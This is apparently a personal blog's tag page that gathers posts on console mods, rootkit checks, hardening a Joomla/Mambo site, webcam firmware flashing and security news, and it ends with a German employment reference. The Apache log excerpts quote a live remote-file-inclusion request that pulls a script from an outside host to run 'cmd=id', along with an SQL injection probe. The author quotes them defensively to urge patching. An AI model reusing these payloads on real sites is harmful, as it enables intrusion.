hacker

Hacker may refer to: read more at WikiPedia

  • Add a led to your Xbox to seehard disk activity

    This mod is quite risky, especially if you
    can not solder with precision 

    xboxIcon Legal Issues

    1. It is strictly forbidden to modify your xBox, sell or install mods chip in france.
    2. Even opening the XBOX is forbidden.
    3. Remember pirating is a crime, support the developers and film companies.

    {mosgoogle center}

    xboxIcon 1. How To

    Required:
    • LED
    • Resistor 220 Ohms

    The resistor (value depending of the LED power) has to be soldered on the longest LED wire



    +5 Volts is taken from the connector, you can open the connector and close it without any difficulties

    The trickiest part is to solder on pin39 the signal (negative)

    You should also verify carefully your soldering, this tool may help



    Drill a 3mm hole or bigger depending on LED size

    Final Result


  • A SECURITY flaw could allow hackers to eavesdrop on cellphone conversations made on Bluetooth-based wireless headsets was revealed in april 2004...But at that time an expensive piece of hardware was needed. Now it is even worse a simple brute force while the device are doing keyring exchange...

    "Whitehouse showed in 2004 that a hacker could arrive at this link key without knowing the PIN using a piece of equipment called a Bluetooth sniffer. This can record the exchanged messages being used to derive the link key and feed the recordings to software that knows the Bluetooth algorithms and can cycle through all 10,000 possibilities of the PIN. Once a hacker knows the link keys, Whitehouse reasoned they could hijack the device."

    Now the new attack force the  two bluetooth devices to pair, they can work out the link key in just 0.06 seconds on a Pentium IV-enabled computer, and 0.3 seconds on a Pentium-III

     

  • chkrootkit is a tool to locally check for signs of a rootkit. chkrootkit is a common unix-based program intended to help system administrators check their system for known rootkits. It works by using several mechanisms, including comparison of file signatures to known rootkits, checking for suspicious activity (processes listed in the proc filesystem but not in the output of the 'ps' command.
    Log to the server with ssh as root user

    Download 
    chkrootkit.
    # wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

    Unpack the chkrootkit you just downloaded.
    # tar xvzf chkrootkit.tar.gz

    go to that  directory
    # cd chkrootkit

    Compile
    # make sense

    Run
    # chkrootkit

     
    •Receive e-mail everyday with the result chkrootkit
    For Root user
    # crontab -e
    For any user
    # crontab -e -u username

    and add

    •0 3 * * * (./usr/sbin/chkrootkit 2>&1 | mail -s "chkrootkit output" -c This email address is being protected from spambots. You need JavaScript enabled to view it.,This email address is being protected from spambots. You need JavaScript enabled to view it. This email address is being protected from spambots. You need JavaScript enabled to view it.)

    * the correct path can be found with which chkrootkit
    This will run chkrootkit at 3:00 am every day, and e-mail the output to This email address is being protected from spambots. You need JavaScript enabled to view it. and copies to This email address is being protected from spambots. You need JavaScript enabled to view it. and This email address is being protected from spambots. You need JavaScript enabled to view it.

    False alarms:
     "Checking `bindshell'... INFECTED (PORTS: 465)" This is normal and  NOT really a rootkit.

    Nota
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advice you to reinstall the server from scratch, and restore a previous backup (that mean saving nothing from server as soon as the rootkit is revealed....)

    Links
    chkrootkit

  •  I've already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I've found into the log files...

    Hackers trying remote code injection

    were  found more than one time in apache error.log

    [Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

    Remember You should ASAP update the following components to their latest version:
    • com_securityimages < 3.0.5 use at least a version  > 3.0.6
    • com_hashcash < 1.2.1 use at least a version  > 1.2.2
    • com_bayesiannaivefilter has been developed but never release as a component, but it is still available at Joomla forge developer tree.
    This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You'll find that th script is readable and contains a header.
    Defacing Tool 2.0 by xxxxxx
    Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.

    Solutions:
    1. For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
    2. If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini  allow_url_fopen = Off
     Hackers trying to access well known PHP files

    each lines below at least more than 500 times...in 1 day

    [Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
    [Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
    [Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
    [Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

    Hacker trying to access  files that do not exist
    • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
    • wiki/administrator/
    • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
    • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
    • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
    which look like programs brute forcing with a set of rules some paths searching well known vulnerability

    Some strange attempts...

    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
    [Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
    [Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
    [Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
    [Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com

  • i.will.use.google.before.asking.dumb.questions

    Went through this interesting article “How To Ask Questions The Smart Way”, while a bit old (2006), it is full of very good advices for asking questions the smart way (and also sometimes finding an answer on your own).

    In the world ofhackers, the kind of answers you get to your technical questions depends as much on the way you ask the questions as on the difficulty of developing the answer. This guide will teach you how to ask questions in a way more likely to get you a satisfactory answer.
    Now that use of open source has become widespread, you can often get as good answers from other, more experienced users as from hackers. This is a Good Thing; users tend to be just a little bit more tolerant of the kind of failures newbie's often have. Still, treating experienced users like hackers in the ways we recommend here will generally be the most effective way to get useful answers out of them, too.
    The first thing to understand is that hackers actually like hard problems and good, thought-provoking questions about them. If we didn't, we wouldn't be here. If you give us an interesting question to chew on we'll be grateful to you; good questions are a stimulus and a gift. Good questions help us develop our understanding, and often reveal problems we might not have noticed or thought about otherwise. Among hackers, “Good question!” is a strong and sincere compliment.

  • An interesting articles which also explain You how to empower the queries capacities of Google serach engine. Note that Google has nothig to do with this security breach, their search engine is simply too efficient and users not enough clever to store all sensitive data in a cryptographical container like PGPdrive, or TrueCrypt.

    Google is in many ways the most useful tool available to the bad guys, and the most dangerous Web site on the Internet for many, many thousands of individuals and organizations. Read more at SecurityFocus

    Google has been and will always be a valuable tool in my daily work as It allow me to resolve a lot of developer problem in no time...

  • 500px-android-logo_svg&160;Nullwire has posted a how to

    1. Download and install the Android SDK found here.
    2. Download this zip containing new latest Android images:

    3. Unpack files to a temporary location.
    4. Backup the folder <android-sdk-folder>/tools/lib/images (<android-sdk-folder> is the Android SDK installation folder)
    5. Replace the files ramdisk.img, system.img and userdata.img in <android-sdk-folder>/tools/lib/images with the files unpacked from the zip in step 3.
    6. Start the emulator and wait.

    android.cupcake And if you don't want to try this HACK, just watch the posted Screencast detailing the main new features of Cupcake
  • checklist

    An exploited or hacked server is one that is no longer fully under your control and someone else is now partially using your server for their own purposes.

    You’ll find in this mind map

    What bad guys can do and remedies

    Why a mind map?

    A mind map is a diagram used to visually outline information. mind map help you take notes, brainstorm complex problems, and think creatively.

    • Information are summarized efficiently to be usable and accessible,
    • Inter-relationships are clear between the different concepts,
    • It is the most flexible for organizing associative, divergent and convergent thinking (Convergent thinking involves aiming for a single, correct solution to a problem, whereas divergent thinking involves creative generation of multiple answers to a set problem),

    You can find the latest version at

    http://linux-compromised-server-checks.waltercedric.com/

  • Typically Me, an article before "how to enhance security of webapplication", and article after "how to break everything a lot faster"... I suggest You to keep alwas an eyes at what going on behind the scene (hacking) in order to do everything You can to save your ass

     If you do Web application security assessments, this page is for you. We've gathered all of the tools and techniques discussed in Hacking Exposed: Web Applications (that we use every day as consultants) and cataloged them here. This is an abbreviated recitation of Appendix B in the book, with live hyperlinks for easy access. Keep your eyes on this space as we post custom scripts and tools from the authors!  from http://www.webhackingexposed.com

  • In this post, I will show you how to bring an old webcam of 2000 back to life for the latest iterations of Windows Vista/Seven by injecting the firmware of another webcam into it.

    Philips Webcam ToUcam Pro -  PCVC740K

    Year 2000
    Philips Webcam SPC900NC VGA CCD with Pixel Plus

    Year 2008
    pcvc720k_40_tlf_ spc900nc_27_rtv_

    If you read the Philips Support FAQ

    You will end up with this laconic text: “There are no Vista drivers available for this product due to the product’s age.”

    Although there is an alternate way, that only work with Windows Vista, the solution I propose you is to just make the driver think that it has another webcam plugged in! This work since the reality is that most webcam out there have seen no big hardware changes since many many years. (except packaging/prize and blinking led)

    DISCLAIMER !!! I'm not responsible for damages you could cause to your webcam because of errors in realizing the described firmware upgrade...

     

     

    Success story

    The following webcam got converted successfully:

    • 1 webcam PCVC840K converted into SPC900NC
    • 2 webcam PCVC740K converted into SPC900NC

    The following failed but I was able to recover from the saved firmware:

    • Philips PCVC680 USB VGA Camera; Video

    Contact me if you successfully convert your webcam.

    How to

    You need an Operating system that is still able to recognize your webcam. Most of Philips webcams which are discontinued, and refuse to work under Vista/Seven were working under windows XP. So try to get an access to and old PC running that OS. Lucky owner of Windows 7 professional/Ultimate are able to use “Windows XP mode”.

    Download the software WCRMAC here http://www.burri-web.org/bm98/soft/wcrmac/wcrmac-2.0.85.zip and install it.

    WcRmac allows some internal memory modifications of web cams based on the Philips SAA8115 / 8116 camera chips. That are usually cameras with a 640x480 CCD sensor (various brands).

    Connect the webcam under windows XP, and install eventually the required drivers. At that point you must be to see the webcam and get an image in windows explorer. Leave the webcam running in the background.

    Download the latest firmware of the latest Philips webcam flagship SPC900NC here http://www.home.zonnet.nl/m.m.j.meijer/D_I_Y/spc900nc.bin and copy this file under  the directory

    • C:\Program Files\TWIRG\WcRmac\binary\8116 

    Start WCRMAC and connect the webcam by selecting it under the menu “webcam”

    bin-tab

    Now get to the tab “binaries” and click ''Get current and save as” to make a copy of the existing firmware to disk. Now select the latest firmware in the list spc900nc.bin and click on the button “load”

    Now the webcam should be recognized under Windows vista/ seven (even 64 bits)! It will have all the software goodies of the latest of the latest webcam: faces detection, anti flickering, up to 90 frame per seconds!

     

     

    References

  •  .htaccess files are very versatile, and can easily protect some area of Your Homepage. In the case of Mambo, I am here giving You a way to secure it in less than 5 minutes. 

    All You have to do is to drop a file named .htaccess in Your /administrator directory

    Here is a templates of .htaccess You can use
    # Do not allow any user to access this file - to copy in all .htaccess
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    force admin area with .htaccess password
    AuthType Basic
    AuthUserFile /pathto/.htpasswd
    AuthGroupFile /dev/null
    AuthName "Walter Cedric Administrator Area"
    <Limit GET POST>
    require valid-user
    </Limit>

    • pathto should normally be outside you public webserver directory!
      In plesk, that means outside the httpdocs directory!
    • .htpasswd is a Text file which contains a mapping login:password.

    Example of .htpasswd
    admin:XXXXXXX

    XXXXXXX must be replace by it's crypt version, use that Url to create a new
    crypted value:

    http://de.selfhtml.org/cgi-bin/cryptform.pl?password=aSI45I56B4KgR34542

    In this example, I want to have aSI45I56B4KgR34542 as password (my real password is even more complex!), the page then display me

    cziW29BR6Y3fM

    Be careful it is changing at each reload of the page since the system add "salt" to the password in order to avoid brute force attack with dictionnary.

    So I create a file .htpasswd which contains:

    Example of .htpasswd
    admin:cziW29BR6Y3fM

    So In order to be able to go in my administrator Mambo panel, I will have to type

     

    user name: admin
    password: cziW29BR6Y3fM

    HTACCESS is containing a lot more keywords and way to protect some data or directories.
    I recommend You to google a little bit to find some exhaustive articles like this one in german:
    optionen">http://de.selfhtml.org/servercgi/server/htaccess.htmoptionen

    If Youre using my component hashcash or any statistics log tools on YOur server, YOu may know the IP of the bad guys which try to break Your site. There is a way to block these attacking zombies at the server level. Just extends the section Limit of the .htaccess file

     <Limit GET POST>
    order allow,deny
    allow from all
    deny from
      XXX.XXX.XXX.XXX
    deny from .microsoft.com 
    </Limit>

    where XXX.XXX.XXX.XXX is the IP or part of the IP (XXX or XXX.XXX or XXX.XXX.XXX), but it can be a DNS. You can add as many lines as You want.

  • sony_playstation_ps3

     Sony PS3 Modding - Homebrew, Upgrades, Mods, and Hacks is a blog already listing an impressive list of mods for the Playstation 3, some examples:

     
  • Bob did a lot of (obvious) mistakes, but you will still be able to learn a lot by going through this mindmap. The names have been changed to protect the innocent.

    Hack of Bob

     

  • A lot of Mambo/Joomla site has been hacked last week, since I've already help someone hardening an installation (mambo 4.5.2.3), I've decide to write a tutorial for the benefit of the open source community...

     Some steps are common sense while others are not.

    But:

    • Do not think that doing all steps below will protect You! nothing is secure in the computer world! or not very long...
    • Do not think that after doing all steps below, Joomla will be as user friendly for You as before! we are restricting rights, changing some behaviours of the webserver, it will be more difficult to publish content, on the other side, articles and content will be safer.
    • Security come always with a pain!.

    Consider this page as a work in progress, feedback is as usual welcomed. Click read more for the article

    Choose a (better) FTP password for accessing your Homepage which is not trivial! using rules in annexe A

    Requirements: having a valid login and password to your plesk account

    How: http://yoursite.com:8443/

    Go to main page, If your hosting company allow you to create many subdomains, click on the right one, here on www.waltercedric.com

     
    On Plesk main page, click on domain, herewaltercedric.comon the next page, on Setup 
      
    Then enter New FTP password, and save  
    Choose a DIFFERENT Joomla/Mambo administration password using rules in annexe A

    Requirements: having a valid login and password to your Joomla administrator account

    How:

    Go to Your administrator panel
    For ex http://yourhost/administrator/
    click on your login name, here onadmin
     
    Enter a new password 
    Choose aDIFFERENT Plesk password for the administration of Your site using rules in annexe A

    Requirements: having a valid login and password to your Plesk administrator panel

    Go to: http://yoursite.com:8443/ which is the default URL for Plesk, attention it may vary depending on your hosting company

    On the main page, click on editAnd enter new password
    Choose aDIFFERENT mySQL password for the Joomla/Mambo tableusing the rules in annexe A

    How
    Use the plesk administration panel

    On Plesk main page, click on domain, herewaltercedric.comon the next page, click on Databases
    Then on your Joomla database (here for memos)then click on the right user: heremosuser, Note that I have
    a special user for backup purpose with only select rights! and change password
      
    Open the file /configuration.php and change the key mosConfig_password 
    Adapt user rights of the mySQL Joomla user

    a mySQL user may have following privileges:

    This user, for example joomlaUser should ONLY have insert (new comment, guestbook) and deleteand updaterights on Joomla/Mambo database

    SHOW GRANTS FOR 'mosdev'@'%';
    GRANT ALTER,CREATE,CREATE TEMPORARY TABLES,CREATE VIEW,DROP,EXECUTE,LOCK TABLES,PROCESS,SHOW DATABASES,SHOW VIEW ON *.* TO 'mosdev'@'%' WITH GRANT OPTION;
    FLUSH PRIVILEGES;

    Do not allow drop or create table, normal operation of Joomla do not require it! Of course as soon as You want to install a new component, You will have to temporarly allow joomlaUserto create new table (if the component require it)

    Adapt files right on your server

    Heritage of UNIX, file rights are organized in 3 groups, user, group, all. Each group may be able to read (r) write (w) or execute (x) file individually. the combinaison rwx is read in octal rwx = 7 for each group, so 777 is the worse settings: anybody may be able to delete or change your file on server...

    This is how look my file structure

    RecommendedSet toCHMOD equivalent
    files rights:r_ _r_ _r_ _444
    directory rightsr _ x r _ x r _ x555
    Exception for /cache directoryrwxrwxrwx777

    Howuse an FTP tool like CuteFTP, on selected resources, use right click menu , and check the bit:

    Example incuteFTP, note the command is not recursive!

    Side effects

    • You wont be able to use the upload function of HTMLArea: impossible to upload images or file using the administrator articles editor.
    • Each time You wan to publish a new articles with pictures inside, You'll have to copy them with FTP before editing in order to be able to insert them into the text.
    • In order to write a file into the directoy C in the path A/B/C, You will have to set temporary directory A and B and C to rwxr-xr-x rights (CHMOD 755)!
    Protect some part of Joomla using additionnal password like .htaccess

    Requirements: Your provider must support .HTACCESS per directory

    How:

    Read my tutorial HERE

    Side effects

    • Some component or code trying to read file form the admin area (if protected by a htaccess file), may bring a popup login windows to your users, but it is possible to find these problems and solve them quickly. My plugin securityimages in its first version was also having this error (coding)
    Run a part or your site in HTTPS mode

    For added security, you can force users to access your pages using an SSL (Secure Socket Layer) connection. This means transmitted data is encrypted, so passwords and webpages cannot be read in cleartext over the internet.

    Ideally only the administration part (all URL beginning with http://yousite/administrator/), or your whole site.

    Why:if your site run in http mode, all password and fields submitted to the server are send in cleartext (can be read). an attacker may be able to intercept or fake user by rerouting the http request. In https mode, data are travelling encrypted on the network and a session key avoid replaying attacks. Moreover it is not realistic to have a commercial business on internet without running https

    Requirements: Your provider/hosting company should allow it

    How

    Run FULL site in httpsRun PART of site in https
    • In plesk, just copy your Joomla/Mambo file structure from /httpdocs to the directory /httpsdocs with a FTP tool
    • Eventually put a file index.html in /httpdocs which redirect users to the protected https area to show to users that your site still exist (it will not bring an error 404: page nt found)
    This is certaimly not as easy as running Your full site with https,


    Side effects

    • If You install a new site, no problem
    • If You have an existing homepage and are heaviliy indexed by Google and Co and/or many users have Bookmark You, Users will be disturbed to say the least, and Google may think You are using some spammer techniques (moving and creating/dissimulating new content)
    Review OpenSEF/SEF 404 logs

    if a SEO/SEF component is installed, You may be able to look at unusual or incorrect url. This typically can reveal some SQL or parameter injection in existing code.

    SEO will in fact reject some URL and redirect user to your home root index.php, instead of displaying an error message or revealing informations about file structure, which is a positive side-effect

    ex:

    .../banner.php?id=120&client="select 1 from dual" someone is trying to test SQL injection in the component Banner

    Review access logs

    Search in log file about unusual behaviour, is someone accessing too often (in a small interval) to /index2.php (admin part of your site) -> this may be a brute force attack!

    Requirements: have a plesk access

    How:

    On Plesk main page, click on domain, herewaltercedric.comon the next page, on Log Manager
    • The server access log records all requests processed by the server. Access log for http:// and access ssl log for https://
    • The server error log, whose name and location is set by the error log directive, is the most important log file. This is the place where Apache httpd will send diagnostic information and record any errors that it encounters in processing requests. It is the first place to look when a problem occurs with starting the server or with the operation of the server, since it will often contain details of what went wrong and how to fix it.
    • The xferlog file contains logging information from the FTP server daemon, ftpd
      
    Make Backup!

    Joke: "Real men don't do backup but they often cry"

    mySQL :
    4 ways to automate MAMBO database backup..

    Ftp
    use any FTP tool to sync or Plesk backup function

      
    Keep Your Joomla/mambo installation up to date.

    Always use the latest version of Joomla: www.joomla.org Or the latest version of Mambo: www.mamboserver.com

    As soon as a new version of Joomla/mambo is available, install it in the same day!

    • Hacker will look at the patch and search for unpatched server! It has never been so easy to search for running version of a certain CMS version, thanks to search engine. For giving You an example, a hacker may search in Google (but any search engine will work) all site running Joomla/Mambo with allinurl: administrator/index2.php so install patches very fast!
    • Make a backup (just in case), and install the new patch, you can also install the patch on your local running instance of Joomla
     For paranoid or How to push security even higher

    All actions below require some knowledge or time...

    Change regurly ALL password above!

    just in case, someone get Your password or part of it. Ideally You must change your password before a brute force can find it. Or as soon as logs reveal a possible attack just in case the hacker has not start doing something bad with Your account..

    With decreasing frequency:

    • Joomla Admin password
    • mySQL user password
    • Plesk admin password
    • FTP user password
    Attack surface reduction (ASR)

    Definition:
    M$ has a good article here (idea is not coming from them, but they are trying to evangelize a lot of developers with good articles)

    So bugs/security issues can not exist in a code if the code do not exist on the server.... :-)

    Quite easy to understand but really difficult to achieve, here is a way to do it....

    1. Define Your requirement, list all components/modules/mambots that you need to run.
    2. Unpublish all components/modules/mambots
    3. Test Your site,
    4. If everything run correctly, remove one components/modules/mambots at a time, and test Your site
    5. Take care when installing next CMS patch, that you do not copy uneeded files on your server. It may be surprising, but even if the component is not published but it's code is physically present on server dissk, it may cause a security vulnerabilities.

    You know have a customized version of Joomla/Mambo with a lot less code running and possibly a lot less unknow vulnerabilities! It will be a pain to maintain.

    Log are always telling the truth! (sometimes)

    You may want to install of write a tool which parse automatically Apache, Tomcat, PHP, mySQL logs to monitor

    Just for FUN....

    Just to give you an overview of some crazy things that can be done....

    • I've read some times ago, a person which have customized a linux version. In order to be sure that if someone ever get an access to the disk, it won't be able to execute any command, he rename all files and commands on disk...This is also possible for Joomla. Write a JAVA/C#/other parser which rename all files/directories and changes all include, include_once, require, require_once with UUID. It is possible but surely (a pain to) maintain.
    • If you have a full webserver for You, You can create a special user which will start PHP and Apache and not be able to write or erase file.
    • The last crazy thing I can imagine (but with time I can be more creative ;-) ) would be to create release of  my homepage, burn it on a DVD (Read only) and publish it on the webserver.
    Of course this latest example do not allow You to use the CMS normally, You have a bloody Read only site, but nobody will be able to tamper data...

     

     

    Normally Your provider is already doing a lot under the scene, and may have done some stuff for You. It can be useful to contact him for asking what it is already monitoring or doing from preventing Your site from being hacked.

    Congratulations, You have now a lot more secure Joomla/Mambo secure homepage!

    Comments are as usual welcomed, use the contact section of this site!

    Annexes

      
    A. Choosing a good password
    • NEVER use any words that can be found in a dictionnary! common brute force program can try million of passwords in seconds
    • Do not use your name, birthday, or part of your domain name
    • A good password is at least 10 or more character long! (brute forcing entropy get too high after 7 characters)
    • Use all character of keyboard! @_! and use different case and number

    Ex: dR2_z57zzU!sP is not a bad password

    B How to store all passwordsCreate a Text file, and crypt it with www.truecrypt.com or www.pgp.com (pgpdisk)
    C Class of attacksI've write a small article, listing all web vulnerabilities (HTML partiel) and (PDF complete)
    D Some tools
    • Beyond Compare from www.scootersoftware.com To deal with the huge amount of PHP files contained in Joomla/Mambo, and install more easily patches or synchronize folders, I strongly recommend You to try or buy a Beyond Compare Licence. This tool is able to compare directories, preview changes, and even compare a locale directory with a remote FTP server.

     

    E https rewriting for admin panelcreate a file .htaccess and copy it in /administrator, if a file already exist (it should!), add lines which ae missing in it

    # Do not allow any user to access this file - to copy in all .htaccess
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    #/administrator/.htaccess
    RewriteEngine on
    RewriteRule ^/$ /administrator/index.php
    RewriteCond %{SERVER_PORT} !443$
    RewriteRule ^(.*) https://www.waltercedric.com/administrator/$1 [R=301,L]

  • sony_playstation_eye

    The PlayStation Eye is a webcam device by Sony Computer Entertainment for the PlayStation 3 video game console. It is the successor to the EyeToy for the PlayStation 2. In case you have one floating around that you do not use for gaming, why not trying to use it as a webcam? You can find them cheap everywhere on ebay, ricardo.ch, leboncoin.fr

    It is not anymore difficult to make this webcam work under Windows (Sony sell this camera since 2007), as there is good and stable drivers now available. I did test the webcam under Windows 7 64 bits and Skype. It work great as long as there is enough lights in the room.Note that the multi-directional microphone is quite exceptional of quality (The PS3 use it for voice location tracking, echo cancellation, and background noise suppression.)

     

    Features

     

    windows_logo Windows XP, Windows Vista, Windows 7

    The CL-Eye Platform Driver recommended for general users provides audio/video functionality with a single CL/PS3-Eye camera supported in a wide range of native and web applications that use Microsoft Windows DirectShow Framework (Skype, YouTube, Adobe Flash, AIM, MSN Messenger).

    macos_logo MacOS

    A working driver for MacOS can be downloaded from http://webcam-osx.sourceforge.net/

    tux Linux

    Starting with Linux kernel 2.6.29, just plug your PlayStation Eye in a free USB port and enjoy. Tested under OpenSuse 10.2


  • The free60 wiki which aim to document ways to have a linux booting on XBOX360 is since 2 weeks online, and has already some interesting info. (some guys are really a lot crazier than me ;-) )

    I came one more time to XBOX-linux.org which has a page for describing how the first XBOX was hacked. Very technical but a mus to read for all security geek.

    The Hidden Boot Code of the Xbox From Xbox-Linux or "How to fit three bugs in 512 bytes of security code"

    ...
    Microsoft's engineers first seem to have thought that the secret key would never be revealed: security by obscurity. This explains why the decrypted code did not get hashed. Once the secret key was known, anyone could decrypt, patch and reencrypt the flash contents.
    ...
    And how the chain of trust was breaked
    ...
    The design of the first MCPX was very wrong, and the implementation was catastrophic. The design of the second version was a lot better, but the implementation was not. Without the various security holes (Visor and MIST bugs as well as possibly more) and with a working hash function, the system would have been pretty secure. Encrypting the ROM contents with a secret key, i.e. security by obscurity, simply does not work if the key travels over a bus that can be sniffed.

    {mosgoogle}


  • Herr Cédric Walter, geboren am 3. Oktober 1973, ist seit dem 1. März 2000 in unserer Versicherungsgesellschaft angestellt. Für die Zeit vom März 2000 bis Juni 2004 verweisen wir auf unser Zwischenzeugnis von 30. Juni 2004.

    Herr Walter erledigt als Anwendungsentwickler im Ressort Anwendungen Basel im Wesentlichen folgende Aufgaben:

    • Benutzung, Weiterentwicklung und Spezialisierung von gruppenweiten eBusiness-Plattformkomponenten
    • Programmierung von eBusiness Versicherungsapplikationen mittels J2EE, XML, JSF (Programm zur Offerterstellung im Einzelleben-Versicherungsbereich)
    • Wartung und Weiterentwicklung der neuen Infrastruktur für die Entwicklung des Einzelleben-Offertsystem
    • Mitarbeit bei der Untersuchung einer neuen Entwicklungsplattform für die  Entwicklung des neuen Präsentation-Layer des Einzel-leben-Verwaltungssystems
    • Know how Transfer und Support laufender Projekte.

    Wir kennen Herr Walter als pflichtbewussten und im besonderen Masse vertrauenswürdigen und verantwortungsvollen Mitarbeiter. Er verfügt über ein hervorragendes Fachwissen und im technischen Bereich über überdurchschnittliche Fähigkeiten, welche ihm ermöglichen, auch sehr schwierige Aufgaben zu lösen. Er hat immer ausgezeichnete Ideen, gibt wertvolle Anregungen, ergreift selbständig alle notwendigen Massnahmen und führt diese erfolgreich durch. Herr Walter ist belastbar und erbringt auch unter schwierigen Arbeitsbedingungen eine sehr gute Leistung.

    Durch sein kooperatives und freundliches Verhalten ist Herr Walter bei Vorgesetzten, Mitarbeitenden und Kunden geschätzt und beliebt.

    Dieses Zwischenzeugnis erstellen wir aufgrund eines per 1. Januar 2007 stattgefundenen Vorgesetztenwechsels. Wir danken Herrn Walter für die bisher geleisteten wertvollen Dienste und wünschen ihm weiterhin viel Erfolg und Zufriedenheit.

    Helvetia Versicherungen.
    Human Ressources + Dienste
    Dominique Bruat
    Teamleiter Anwendungen basel
    Monika Haering
    Personalleiterin


    Basel, 31. Januar 2007